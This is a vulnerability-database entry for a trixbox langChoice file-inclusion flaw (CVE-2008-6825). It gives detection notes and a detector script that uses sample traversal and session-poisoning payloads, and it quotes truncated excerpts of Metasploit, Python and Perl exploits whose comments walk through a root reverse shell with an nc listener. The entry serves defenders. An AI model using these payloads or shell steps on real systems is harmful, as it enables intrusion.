CVE-2008-6825
Published: 2009-06-05
Priority: P348 · medium · 6.8 (CVSS 2.0)
CVSS vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 20.27% (97.1th percentile)
Directory traversal vulnerability in user/index.php in Fonality trixbox CE 2.6.1 and earlier allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the langChoice parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trixbox | trixbox | <= 2.6.1 | — |
| trixbox | trixbox | — | — |
| trixbox | trixbox | — | — |
Detection & IOCs (extracted from sources)
- Detect POST requests to /user/index.php containing directory traversal sequences (../../) in the langChoice parameter, especially targeting /tmp/sess_ paths with a null byte (%00) terminator.
- Two-stage attack pattern: first POST injects PHP payload into langChoice (session file poisoning), second POST traverses to /tmp/sess_<id>%00 to trigger execution. Alert on sequential POSTs to /user/index.php where the second request contains a /tmp/sess_ path traversal.
- Look for null byte (%00) in the langChoice POST parameter, used to truncate the file path and bypass extension checks.
- Detect PHP code injection patterns in the langChoice POST body, such as opening PHP tags or exec/shell function calls embedded in the parameter value.
- Fingerprint vulnerable trixbox instances by checking HTTP response body for the pattern: v2.6.1 ©2008 Fonality
- The maximum usable payload space is constrained by Apache's LimitRequestFieldSize header limit (8190 bytes minus 23 bytes buffer), limiting shellcode size in the injection phase.
- The sudo-based root shell escalation path works only on more recent trixbox versions; older versions may only yield an asterisk-uid shell.
- After exploitation, the injected PHP payload is left in /tmp/ and must be cleaned up manually; the Metasploit module does not perform automatic cleanup.
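
The detection notes above, turned into checks over captured requests. This is an added example, not part of the original page or of any rule indexed here. It assumes request records that include POST bodies (for instance from a WAF or reverse-proxy capture) and correlates the two stages by client address; the record layout, tag names and sample values are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/user/index.php"
TRAVERSAL = re.compile(r"\.\.[/\\]")
SESSION_FILE = re.compile(r"/tmp/sess_")
PHP_CODE = re.compile(
    r"<\?(?:php|=)?|\b(?:exec|system|passthru|shell_exec|popen|proc_open)\s*\(", re.I)

def classify(method, url, body):
    """Return the indicator tags found in one request's langChoice value(s)."""
    if method.upper() != "POST" or urlsplit(url).path != TARGET_PATH:
        return set()
    tags = set()
    # parse_qs URL-decodes once, so %00 becomes "\x00" and %2F becomes "/".
    for value in parse_qs(body, keep_blank_values=True).get("langChoice", []):
        if TRAVERSAL.search(value):
            tags.add("traversal")
        if "\x00" in value:
            tags.add("null_byte")
        if SESSION_FILE.search(value):
            tags.add("session_path")
        if PHP_CODE.search(value):
            tags.add("php_code")
    return tags

def detect(records):
    """Return per-request alerts, plus two_stage_lfi when a client that sent
    PHP code in langChoice later traverses to a /tmp/sess_ path."""
    alerts, injected = [], set()  # injected: clients seen sending PHP code
    for index, (client, method, url, body) in enumerate(records):
        tags = classify(method, url, body)
        if not tags:
            continue
        alerts.append((index, client, sorted(tags)))
        if client in injected and {"traversal", "session_path"} <= tags:
            alerts.append((index, client, ["two_stage_lfi"]))
        if "php_code" in tags:
            injected.add(client)
    return alerts

# Constructed sample records (client, method, URL, POST body); not real traffic.
SAMPLE = [
    ("198.51.100.7", "POST", "/user/index.php", "langChoice=english"),
    ("203.0.113.9", "POST", "/user/index.php",
     "langChoice=%3C%3Fphp%20%2F%2A%20constructed%20%2A%2F%20%3F%3E"),
    ("203.0.113.9", "POST", "/user/index.php",
     "langChoice=../../../../tmp/sess_CONSTRUCTEDID%00"),
    ("192.0.2.44", "POST", "/user/index.php", "langChoice=..%2F..%2Ftmp%2Fsess_OTHER%00"),
]
```

The `two_stage_lfi` alert is the high-confidence signal; the single-request tags are useful for triage when only one half of the sequence was captured.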
No detection rules found.
Exploit-DB
Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)
exploitdb·2011-01-08
---
```ruby
##
# $Id: trixbox_langchoice.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# -*- coding: utf-8 -*-
require 'msf/core'
class Metasploit3 'Trixbox langChoice PHP Local File Inclusion',
'Description' => %q{
This module injects php into the trixbox session file and then, in a second call, evaluates
that code by manipulating the langChoice parameter as described in OSVDB-50421.
},
'Author' => ['chao-mu'],
'License' => BSD_LICENSE,
'Version' => '$Revision: 11516 $',
```
Exploit-DB
Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution
exploitdb·2008-07-12
---
```python
#!/usr/bin/python
# TrixBox 2.6.1 langChoice remote root exploit
# muts from offensive-security.com
# All credits to Jean-Michel BESNARD
# Same same, but different.
# http://www.offensive-security.com/0day/trixbox.py.txt
##################################################################################################
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# uname -a
# Linux trixbox1.localdomain 2.6.25.7 #4 SMP Tue Jun 17 19:35:11 EDT 2008 i686 i686 i386 GNU/Linux
##################################################################################################
import sys
from socket import *
import re
import os
from time import sleep
print ("[*] BY THE POWER OF GRAYS
```
Exploit-DB
Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)
exploitdb·2008-07-09
---
```perl
#!/usr/bin/perl -w
# Jean-Michel BESNARD / LEXSI Audit
# 2008-07-09
# This is an update of the previous exploit. We can now get a root shell, thanks to sudo.
#
# perl trixbox_fi_v2.pl 192.168.1.212
# Please listen carefully as our menu option has changed
# Choose from the following options:
# 1> Remote TCP shell
# 2> Read local file
# 1
# Host and port the reverse shell should connect to ? (:): 192.168.1.132:4444
# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]
# root
# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)
# Press enter to continue...
# done...
# nc -l -v -p 4444
# listening on [any] 4444
```
Metasploit
Trixbox langChoice PHP Local File Inclusion
metasploit
This module injects php into the trixbox session file and then, in a second call, evaluates that code by manipulating the langChoice parameter as described in OSVDB-50421.
No writeups or analysis indexed.
References
- http://archives.neohapsis.com/archives/fulldisclosure/2008-07/0101.html
- http://osvdb.org/50421
- http://www.securityfocus.com/bid/30135
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43686
- https://www.exploit-db.com/exploits/6026

Published: 2009-06-05